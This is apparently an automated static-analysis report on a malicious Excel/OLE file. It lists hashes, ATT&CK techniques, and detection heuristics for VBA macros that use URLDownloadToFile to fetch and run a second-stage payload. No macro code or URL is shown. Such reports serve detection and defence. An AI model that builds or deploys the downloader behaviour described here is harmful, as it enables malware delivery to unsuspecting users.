Malicious Office (OLE) / .XLSX — malware analysis report

Static analysis result for SHA-256 1136a76ea8184a8f…

MALICIOUS

Office (OLE) / .XLSX

36.5 KB Created: 2023-02-20 10:14:07 Authoring application: Microsoft Excel First seen: 2023-02-20
MD5: 0dde13582231ec6ad2f59da240066026 SHA-1: 089e01fcd775d7768788917c6dfc595f3b0a23c7 SHA-256: 1136a76ea8184a8fe4c075b839cc3b1cd169351d0f3410a741b3719059e89e9f
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The file contains VBA macros that utilize the URLDownloadToFile API, indicating an attempt to download and execute a secondary payload. The use of CreateObject and Environ() calls further suggests dynamic execution and potential environment interaction. While the exact URL is obfuscated, the presence of these indicators strongly points to a downloader or droppper functionality.

Heuristics 5

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
ca81e31ce4f8342cdfcf5f64530a9ad45d5c332e89a0f7c82ecf2aa37ff1ca03		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 2320 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.